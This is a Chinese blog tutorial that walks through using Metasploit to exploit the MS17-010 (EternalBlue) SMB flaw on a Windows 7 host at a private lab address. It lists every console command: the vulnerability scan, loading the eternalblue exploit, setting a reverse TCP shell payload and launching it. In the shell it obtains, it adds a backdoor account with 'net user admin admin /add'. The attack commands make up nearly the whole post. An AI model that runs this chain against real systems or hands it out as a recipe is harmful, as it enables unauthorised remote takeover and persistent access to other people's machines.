使用 msf 渗透攻击 Win7 主机并远程执行命令
实战-使用 msf 渗透攻击 Win7 主机并远程执行命令
通过 msf 模块获取 Win7 主机远程 shell
- 先扫描目标是否存在 ms17-010 漏洞
msf6 > search ms17-010

- 使用 use 命令选中这个模块
msf6 > use auxiliary/scanner/smb/smb_ms17_010

- 查看模块需要配置的信息
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

需要我们配置 RHOST 主机 IP
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.113.134

开始扫描
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

查找攻击模块
msf6 > search ms17-010

使用 use 命令加载模块
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

设置目标主机IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.113.134
查看 exploit target目标类型:
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

msf6 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell
type:payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/shell/reverse_tcp
查看一下 payloads 需要配置什么信息
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options #查看加载到的
payload信息

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit


直接执行的话会获得目标主机的 SEHLL
使用 DOS 命令创建用户
C:\Windows\system32>net user admin admin /add

C:\Windows\system32>chcp 65001
查看用户
C:\Windows\system32>net user

查看拿到的用户权限
C:\Windows\system32>whoami

关闭链接 Ctrl+c
Abort session 1? [y/N]

本文来自博客园,作者:长温不喜风云,转载请注明原文链接:https://www.cnblogs.com/changwen12138/p/18987571

浙公网安备 33010602011771号